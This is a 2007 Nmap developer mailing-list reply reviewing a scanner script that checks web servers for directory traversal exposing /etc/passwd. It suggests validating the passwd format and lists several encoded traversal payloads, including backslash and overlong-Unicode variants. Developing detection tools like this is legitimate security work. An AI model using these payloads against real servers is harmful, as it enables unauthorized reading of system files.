Nmap Development mailing list archives
Re: [NSE Script] HTTP probe for /etc/passwd
From: Brandon Enright <bmenrigh () ucsd edu>
Date: Sat, 21 Jul 2007 01:19:48 +0000
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 20 Jul 2007 20:00:27 -0500 plus or minus some time MadHat Unspecific <madhat () unspecific com> wrote:
Kris Katterjohn wrote:Hey everyone! I attached HTTPpasswd.nse, which is a script to probe for /etc/passwd through HTTP servers that are susceptible to directory traversal. It's my first script that actually does something, so any comments are welcome and appreciated.Checking for a positive return code is not always useful. Custom 404 messages can produce 200 return codes in some configurations. It would be better to check the response for a specific entry like "root:".
The exact same thing occurred to me as well. In addition to checking for a 200, you should check that at least one line matches the general format of /etc/passwd. Something simple like "the first line has more than one ':'" would probably work just fine. Also, while doing '../' x 10 is probably the canonical directory transversal attack, there are many other useful techniques that yield the same result. Starting on page 264 of the book "Exploiting Software, How to Break Code" (ISBN 0-201-78695-8) several alternate encoding techniques are outlined. You might want to try a few of these (mostly from the book): .../../../etc/passwd ....????./../../etc/passwd ..\..\..\etc\passwd # works on many servers ..\/..\/..\/etc\/passwd Of course, you should encode these in %XX format as well as leaving them as ASCII bytes. Also, you might want to try Unicode. '.' is 0xC0AE, '/' is 0xC0AF, and '\' is 0xC19C. Obviously it is a trade-off between speed and thorough checking so what you have down already might be enough. Thanks for the excellent contribution, I can't wait to test this. Brandon -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGoV80qaGPzAsl94IRAuMJAKCv04gZYcS5GBsmGzz1BsN3VVkNpACgrNnJ fU630Lo5kYz0LhsSgkXH4o4= =XNdU -----END PGP SIGNATURE----- _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://SecLists.Org
Current thread:
- [NSE Script] HTTP probe for /etc/passwd Kris Katterjohn (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd MadHat Unspecific (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd Brandon Enright (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd Kris Katterjohn (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd Kris Katterjohn (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Brandon Enright (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Kris Katterjohn (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Brandon Enright (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd Brandon Enright (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Kris Katterjohn (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Fyodor (Jul 21)
- Re: [NSE Script] HTTP probe for /etc/passwd Brandon Enright (Jul 22)
- Re: [NSE Script] HTTP probe for /etc/passwd Fyodor (Jul 22)
- Re: [NSE Script] HTTP probe for /etc/passwd MadHat Unspecific (Jul 20)
- Re: [NSE Script] HTTP probe for /etc/passwd Gaveen Prabhasara (Jul 22)